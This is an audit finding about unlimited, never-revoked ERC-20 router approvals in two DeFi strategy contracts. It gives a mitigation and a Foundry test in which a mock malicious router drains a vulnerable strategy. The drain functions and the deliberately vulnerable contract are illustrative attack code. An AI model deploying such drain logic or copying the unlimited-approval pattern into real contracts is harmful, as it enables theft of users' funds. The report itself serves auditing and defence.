DeFiFoundrySolidity
16,653 OP
Submission Details
Severity: low
Valid

Unlimited Token Approvals Expose Strategy to Complete Asset Drain

Summary

The StrategyArb and StrategyMainnet contracts grant unlimited allowances (type(uint256).max) over their underlying token to external contracts (the transmuter, the router, and the Curve RouterNG). The allowance is never capped or revoked, and setRouter grants the new router an unlimited allowance without zeroing the previous router's, so every router the strategy has ever used retains full spending rights over its balance. If any of those contracts is compromised, the strategy's entire holdings can be moved in a single transaction.

Technical Details

1. Unlimited Approvals in StrategyArb

The StrategyArb contract approves unlimited tokens for both the transmuter and router during initialization and router updates.

Code Reference:

  • Unlimited approval in _initStrategy:

    function _initStrategy() internal {
        router = 0xAAA87963EFeB6f7E0a2711F397663105Acb1805e;
        // Allowance is never reduced after this point.
        underlying.safeApprove(address(router), type(uint256).max);
    }

  • Unlimited approval on router update:

    function setRouter(address _router) external onlyManagement {
        // The previous router's allowance is left untouched.
        router = _router;
        underlying.safeApprove(router, type(uint256).max);
    }

Workflow Context:

  1. The underlying token (WETH) is approved for spending by the router.

  2. These approvals are neither capped nor revoked. In particular, setRouter does not set the outgoing router's allowance to zero before approving the new one, so a compromise of the current router or of any previously configured router gives full control of all tokens held by the strategy.


2. Unlimited Approvals in StrategyMainnet

The StrategyMainnet contract approves the maximum possible amount of underlying tokens to the Curve RouterNG during initialization and router updates.

Code Reference:

  • Unlimited approval in _initStrategy:

    function _initStrategy() internal {
        router = ICurveRouterNG(0xF0d4c12A5768D806021F80a262B4d39d26C58b8D);
        // Standing unlimited allowance; never reset to zero.
        underlying.safeApprove(address(router), type(uint256).max);
    }

Workflow Context:

  1. The underlying token (WETH) is approved for spending by the Curve RouterNG.

  2. If the Curve RouterNG is compromised, a single transferFrom from the router's side moves every approved token; no call from the strategy is required.


Exploitation Scenarios

Scenario 1: Compromised Router in StrategyArb

  1. An attacker gains control of the router contract (the current one, or any previously configured router, since setRouter never revokes the old allowance).

  2. Because the strategy's allowance to the router is unlimited, one transferFrom moves the strategy's entire balance. Illustrative code for the attacker-controlled router (strategy and attacker are placeholder parameters):

    function maliciousSwap(address strategy, address attacker) external {
        // Spends the strategy's standing allowance; nothing has to be called on the strategy.
        token.transferFrom(strategy, attacker, token.balanceOf(strategy));
    }

  3. Result: Complete loss of all underlying tokens held in the strategy.

Quantifiable Example:

  • Assume the strategy holds 10,000 WETH (~$20M at $2,000/WETH).

  • The compromised router drains all tokens in a single transaction.


Scenario 2: Compromised Curve RouterNG in StrategyMainnet

  1. An attacker gains control of the Curve RouterNG contract.

  2. They spend the unlimited allowance to transfer all tokens (strategyContract and attackerWallet are placeholder names):

    function maliciousSwap() external {
        // The allowance is type(uint256).max, so balanceOf(strategyContract) is always within it.
        token.transferFrom(strategyContract, attackerWallet, token.balanceOf(strategyContract));
    }

  3. Result: Complete loss of all underlying tokens (WETH).

Quantifiable Example:

  • Assume the strategy holds 20,000 WETH (~$40M at $2,000/WETH).

  • The compromised Curve RouterNG drains all assets.


Impact Analysis

Severity:

  • Financial Loss: Unlimited approvals expose the strategy to complete asset loss.

  • Operational Disruption: A drained strategy cannot continue operating.

  • Reputational Damage: Loss of user trust in the protocol.

Impact Summary:

  • Total financial exposure for both contracts is $60M in the hypothetical examples above.

Root Cause Analysis

  1. Unrestricted Approvals:

    • Approvals are set to type(uint256).max without limits or constraints, so a router's spending power is the strategy's full balance rather than the amount of any one swap.

  2. Stale Approvals on Router Update:

    • setRouter grants the new router an unlimited allowance but never sets the previous router's allowance to zero, so every router the strategy has ever used keeps full spending rights.

Mitigation Recommendations

1. Limit Approvals to Required Amounts

Approve only the amount needed for the swap about to be executed, immediately before the router call, and reset the allowance to zero afterwards so no standing allowance remains between operations:

    function approveAmount(address spender, uint256 amount) internal {
        // Call with the exact swap amount before the router call, and with 0 after it.
        // Caveat: OpenZeppelin 4.x SafeERC20.safeApprove reverts when moving a
        // non-zero allowance directly to another non-zero value, so reset to 0 first.
        underlying.safeApprove(spender, amount);
    }

2. Implement Time-Limited Approvals

ERC-20 allowances have no expiry, so "time-limited" has to be enforced by the strategy itself: revoke the allowance (approve 0) as soon as the operation that needed it completes, and have setRouter revoke the outgoing router's allowance before the new router is approved, so that a router removed from the configuration can no longer spend anything.
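The following Foundry test is an added example written for this report, not the audited project's code. It reproduces the exploitation scenario above (the router is replaced, but the old router keeps an unlimited allowance and drains the strategy) and the recommended mitigation (swap-scoped allowances plus revocation on router update). It assumes a Foundry project with forge-std and OpenZeppelin Contracts 4.x (the line that still ships SafeERC20.safeApprove); MockWETH, MaliciousRouter, VulnerableStrategy and HardenedStrategy are all constructed here for the demonstration and do not exist in the project.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the audited project's code. Assumes forge-std and
// OpenZeppelin Contracts 4.x. Run: forge test --match-contract RouterApprovalTest -vv
import {Test} from "forge-std/Test.sol";
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

contract MockWETH is ERC20 {
    constructor() ERC20("Mock WETH", "WETH") {}
    function mint(address to, uint256 amount) external { _mint(to, amount); }
}

// A router whose code is attacker-controlled. Its "swap" entry point does nothing;
// drain() only needs the strategy's standing allowance and is callable by anyone.
contract MaliciousRouter {
    IERC20 public token;
    address public attacker;
    constructor(IERC20 _token, address _attacker) { token = _token; attacker = _attacker; }
    fallback() external {}
    function drain(address victim) external {
        token.transferFrom(victim, attacker, token.balanceOf(victim));
    }
}

// The pattern from the report: max allowance at init and on every router update,
// with the previous router's allowance never reduced.
contract VulnerableStrategy {
    using SafeERC20 for IERC20;
    IERC20 public underlying;
    address public router;
    constructor(IERC20 _underlying, address _router) {
        underlying = _underlying;
        router = _router;
        _underlying.safeApprove(_router, type(uint256).max);
    }
    function setRouter(address _router) external {
        router = _router;
        underlying.safeApprove(_router, type(uint256).max); // old router keeps max
    }
}

// Hardened variant: no standing allowance. The exact swap amount is approved right
// before the router call and zeroed after it; a router update revokes the old router.
contract HardenedStrategy {
    using SafeERC20 for IERC20;
    IERC20 public underlying;
    address public router;
    address public management;
    constructor(IERC20 _underlying, address _router) {
        underlying = _underlying;
        router = _router;
        management = msg.sender;
    }
    modifier onlyManagement() { require(msg.sender == management, "!management"); _; }
    function setRouter(address _router) external onlyManagement {
        require(_router != address(0), "router=0");
        underlying.safeApprove(router, 0); // revoke the outgoing router first
        router = _router;
    }
    function swap(uint256 amount, bytes calldata routerCalldata) external onlyManagement {
        underlying.safeApprove(router, amount); // scoped to this swap only
        (bool ok, ) = router.call(routerCalldata);
        require(ok, "swap failed");
        underlying.safeApprove(router, 0);      // leave nothing behind
    }
}

contract RouterApprovalTest is Test {
    MockWETH weth;
    MaliciousRouter oldRouter;
    address attacker = makeAddr("attacker");

    function setUp() public {
        weth = new MockWETH();
        oldRouter = new MaliciousRouter(weth, attacker);
    }

    // Scenario from the report: router replaced, old router still holds max allowance.
    function test_oldRouterKeepsAllowanceAndDrains() public {
        VulnerableStrategy s = new VulnerableStrategy(weth, address(oldRouter));
        weth.mint(address(s), 10_000 ether);
        s.setRouter(makeAddr("newRouter"));
        assertEq(weth.allowance(address(s), address(oldRouter)), type(uint256).max);
        oldRouter.drain(address(s));
        assertEq(weth.balanceOf(attacker), 10_000 ether);
        assertEq(weth.balanceOf(address(s)), 0);
    }

    // Hardened: after a swap and a router update the old router has zero allowance.
    function test_hardenedLeavesNoAllowance() public {
        HardenedStrategy h = new HardenedStrategy(weth, address(oldRouter));
        weth.mint(address(h), 10_000 ether);
        h.swap(1 ether, "");
        assertEq(weth.allowance(address(h), address(oldRouter)), 0);
        h.setRouter(makeAddr("newRouter"));
        vm.expectRevert(); // transferFrom fails: insufficient allowance
        oldRouter.drain(address(h));
        assertEq(weth.balanceOf(address(h)), 10_000 ether);
    }
}
```

The first test passes for the vulnerable pattern, which is the finding: the drain succeeds after the router was replaced, because nothing ever reduced the old router's allowance. In the hardened contract the allowance is non-zero only for the duration of a single swap call, so a compromised or retired router has nothing to spend; the reset-to-zero before re-approval is also what keeps OpenZeppelin 4.x safeApprove from reverting on a non-zero to non-zero change.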

Updates

Appeal created

inallhonesty Lead Judge 10 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Old router approval is not revoked after an update

